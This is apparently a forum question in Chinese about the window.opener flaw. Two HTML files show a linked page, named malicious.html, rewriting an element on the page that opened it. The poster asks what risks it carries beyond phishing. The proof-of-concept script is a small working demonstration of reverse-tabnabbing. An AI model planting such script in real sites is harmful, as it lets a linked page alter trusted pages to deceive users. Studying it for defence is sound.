我不知道你是否知道这个缺陷,但这里有一个基本的例子:
somepage.html(指向恶意.html ):
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Test</title>
</head>
<body>
<p id="test">Some text<p>
<p><a href="malicious.html">lien</a></p>
</body>
</html>
恶意.html:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Test</title>
</head>
<body>
<script>
var win = window.opener;
win.document.getElementById("test").innerHTML = "<strong> This will be written on somepage.html</strong>";
</script>
</body>
</html>
如果我们点击somepage.html上的链接,同一页面将被恶意.html 修改。除了网络钓鱼,这个漏洞还有哪些风险?
此漏洞仅在 Chrome 和 Opera 上得到修补。